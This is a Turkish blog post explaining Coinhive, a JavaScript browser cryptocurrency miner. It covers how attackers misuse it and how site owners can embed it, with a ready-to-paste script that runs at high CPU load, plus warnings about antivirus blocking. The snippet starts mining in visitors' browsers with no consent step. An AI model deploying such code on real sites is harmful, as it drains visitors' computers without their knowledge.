Coinhive Nedir? Nasıl Kullanılır? Ne İşe Yarar?

|
LinkedInBufferHacker NewsMessengerPinterestPocketRedditTelegramTumblrVKWhatsApp

Coinhive, tarayıcı tarafından CPU kaynaklarınızı kullanarak kripto para kazıp kazdığı parayı web sitesinin sahibine gönderen Javascript ile yazılmış bir kripto para madencisidir.

Ne yazık ki bu güzelim kütüphaneyi saldırganlar kötü amaçları için kullanmaya başladı, bu JavaScript kodunu tarayıcı uzantılarına veya programlara gömüp kullanıcı izni olmaksızın kripto para madenciliği (Monero, Dashcoin, DarkNetCoin ve diğerleri) için kullanmaya başladılar.

Coinhive.com Miner Trojan genellikle Internet’ten indirdiğiniz diğer ücretsiz programlarla veya tarayıcı uzantılarıyla birlikte çoğu zaman gelmektedir. Ne yazık ki bazı ücretsiz uygulamalarda her ne kadar size söylemesede bu gibi uygulamaları sisteminize dahil edebilirler.

En basit kullanımı ile size açıklamam gerekirse şu şekilde bir yol izlemeniz gerekmektedir.

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('0nL3AUgxfDfjwb8jbW1NJNZ5s42LCLcs', {
	threads: 16,
	autoThreads: false,
	throttle: 0.1,
	forceASMJS: false
});
miner.start();
</script>

Bu işlemi yaptıktan sonra gözle görülür bir şekilde eklediğiniz sayfaya girdiğinizde CPU tavan yapacak ve consolda hash değerleri akmaya başlayacak. Kullanıcı sitenizde kaldığı süre boyunca kazma işlemi gerçekleştirecek ve haliyle sizde ücretinizi alacaksınız.

Kayıt olup panele girdiğinizde aşağıdaki dashboard ile karşılaşacaksınız.

coinhive-dashboardPin

Bu panel aracılığı ile ödemelerinizi alabilir. Kazma işlemlerini görebilir ve yönetebilirsiniz.

Ayrıca Kısa link oluşturmanız içinde aşağıdaki alan bulunmakta buradan kullanacağınız domaini ekleyebilirsiniz. Ben Ayın 10 unda test için web sitemi ekledim. Göreceğiniz gibi hiçbir kazma işlemi yapılmadığında gözükecek olan durum bu

coinhive-dashboard-shorturlPin

Kullanacak olduğunuz API Anahtarınızı Settings > Sites & Api Keys alanından alabilirsiniz.

Uyarılar

  • Bu yöntem ile web sitenizi ciddi tehlikeye atabilirsiniz. Google ve Antivirüsler tarafından siteniz kötücül barındırılan web sitesi olarak aldılanabilir.
  • Bilinen tüm antivirüsler ve reklam engelleyiciler bu sistemi bloke etmektedir.
  • Kullanıcıların web siteniz üzerindeki davranışları değişebilir.
  • Uzun süreli ve izinsiz kullanıma uygun değildir.

Bu yöntem ile yaptığınız kazım işlemi tamamen sizin sorumluluğunuzdadır. Olayin sonucunda cikabilecek kotu sonuçlara siz katlanirsiniz, doğan kötü sonuçlar bizi ilgilendirmez.

Sistem Uzmanı, Linux Hacısı, El-Kernel

Yorum yapın